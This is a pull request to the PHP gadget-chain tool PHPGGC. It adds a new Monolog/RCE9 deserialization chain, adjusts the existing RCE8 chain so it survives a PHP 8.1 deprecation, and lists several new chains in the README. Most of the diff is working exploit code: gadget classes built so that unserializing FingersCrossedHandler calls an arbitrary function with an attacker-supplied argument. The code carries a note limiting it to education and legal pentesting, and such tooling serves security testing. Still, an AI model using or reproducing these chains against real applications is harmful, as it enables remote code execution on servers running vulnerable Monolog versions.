### PR TITLE
Monolog/RCE9

### DIFF
--- a/README.md
+++ b/README.md
@@ -40,6 +40,7 @@ Kohana/FR1                                3.*                                Fil
 Laminas/FD1                               <= 2.11.2                          File delete            __destruct          
 Laminas/FW1                               2.8.0 <= 3.0.x-dev                 File write             __destruct     *    
 Laravel/RCE1                              5.4.27                             RCE (Function call)    __destruct          
+Laravel/RCE10                             5.6.0 <= 9.1.8+                    RCE (Function call)    __toString          
 Laravel/RCE2                              5.4.0 <= 8.6.9+                    RCE (Function call)    __destruct          
 Laravel/RCE3                              5.5.0 <= 5.8.35                    RCE (Function call)    __destruct     *    
 Laravel/RCE4                              5.4.0 <= 8.6.9+                    RCE (Function call)    __destruct          
@@ -47,8 +48,10 @@ Laravel/RCE5                              5.8.30                             RCE
 Laravel/RCE6                              5.5.* <= 5.8.35                    RCE (PHP code)         __destruct     *    
 Laravel/RCE7                              ? <= 8.16.1                        RCE (Function call)    __destruct     *    
 Laravel/RCE8                              7.0.0 <= 8.6.9+                    RCE (Function call)    __destruct     *    
+Laravel/RCE9                              5.4.0 <= 9.1.8+                    RCE (Function call)    __destruct          
 Magento/FW1                               ? <= 1.9.4.0                       File write             __destruct     *    
 Magento/SQLI1                             ? <= 1.9.4.0                       SQL injection          __destruct          
+Magento2/FD1                              *                                  File delete            __destruct     *    
 Monolog/RCE1                              1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+    RCE (Function call)    __destruct          
 Monolog/RCE2                              1.4.1 <= 2.7.0+                    RCE (Function call)    __destruct          
 Monolog/RCE3                              1.1.0 <= 1.10.0                    RCE (Function call)    __destruct          
@@ -57,6 +60,7 @@ Monolog/RCE5                              1.25 <= 2.7.0+                     RCE
 Monolog/RCE6                              1.10.0 <= 2.7.0+                   RCE (Function call)    __destruct          
 Monolog/RCE7                              1.10.0 <= 2.7.0+                   RCE (Function call)    __destruct     *    
 Monolog/RCE8                              3.0.0 <= 3.1.0+                    RCE (Function call)    __destruct     *    
+Monolog/RCE9                              3.0.0 <= 3.1.0+                    RCE (Function call)    __destruct     *    
 Phalcon/RCE1                              <= 1.2.2                           RCE                    __wakeup       *    
 PHPCSFixer/FD1                            <= 2.17.3                          File delete            __destruct          
 PHPCSFixer/FD2                            <= 2.17.3                          File delete            __destruct          

--- a/gadgetchains/Monolog/RCE/8/chain.php
+++ b/gadgetchains/Monolog/RCE/8/chain.php
@@ -6,7 +6,7 @@ class RCE8 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
     public static $version = '3.0.0 <= 3.1.0+';
     public static $vector = '__destruct';
-    public static $author = 'mir-hossein (Mirhossein Rahmani)';
+    public static $author = 'cf (Charles Fol), mir-hossein (Mirhossein Rahmani)';
     public static $information = 'Please use this exploit only for educational purposes or legal pentest, Thank you!';
 
     public function generate(array $parameters)

--- a/gadgetchains/Monolog/RCE/8/gadgets.php
+++ b/gadgetchains/Monolog/RCE/8/gadgets.php
@@ -45,7 +45,7 @@ namespace Monolog\Handler
         {
             $this->handler = $this;
             $this->buffer = [new \Monolog\LogRecord($parameter)];
-            $this->processors = ['end', $function];
+            $this->processors = ['get_object_vars', 'end', $function];
         }
     }
 }

--- a/gadgetchains/Monolog/RCE/9/chain.php
+++ b/gadgetchains/Monolog/RCE/9/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class RCE9 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '3.0.0 <= 3.1.0+';
+    public static $vector = '__destruct';
+    public static $author = 'mir-hossein (Mirhossein Rahmani)';
+    public static $information = 'Please use this exploit only for educational purposes or legal pentest, Thank you!';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Monolog\Handler\FingersCrossedHandler($function, $parameter);
+    }
+}

--- a/gadgetchains/Monolog/RCE/9/gadgets.php
+++ b/gadgetchains/Monolog/RCE/9/gadgets.php
@@ -1,0 +1,38 @@
+<?php
+
+namespace Monolog\Handler
+{
+    class FingersCrossedHandler
+    {
+        protected $passthruLevel = \Monolog\Level::Debug;
+        protected $handler;
+        protected $buffer;
+        protected $processors;
+        
+        function __construct($function, $parameter)
+        {
+            $this->processors = ['end', $function];
+            $this->buffer = [new \Monolog\LogRecord($parameter)];
+            $this->handler = $this;
+        }
+    }
+}
+
+namespace Monolog
+{
+    enum Level: int
+    {
+        case Debug = 100;
+    }
+
+    class LogRecord
+    {
+        public Level $level = \Monolog\Level::Debug;
+        public mixed $formatted;
+        
+        function __construct($parameter)
+        {
+            $this->mixed = $parameter;
+        }
+    }
+}

--- a/gadgetchains/Monolog/RCE/9/gadgets.php
+++ b/gadgetchains/Monolog/RCE/9/gadgets.php
@@ -11,7 +11,7 @@ namespace Monolog\Handler
         
         function __construct($function, $parameter)
         {
-            $this->processors = ['end', $function];
+            $this->processors = ['get_object_vars', 'end', $function];
             $this->buffer = [new \Monolog\LogRecord($parameter)];
             $this->handler = $this;
         }


### PR DESCRIPTION
Hello,

This GC is a revived version of Monolog/RCE7 for Monolog 3.* and generates (~30%) smaller payloads and doesn't use `GroupHandler`.

~~`end` on an object is deprecated in PHP 8.1, and probably we will lose RCE{8,9}.~~  <--- Solved.

Thank you.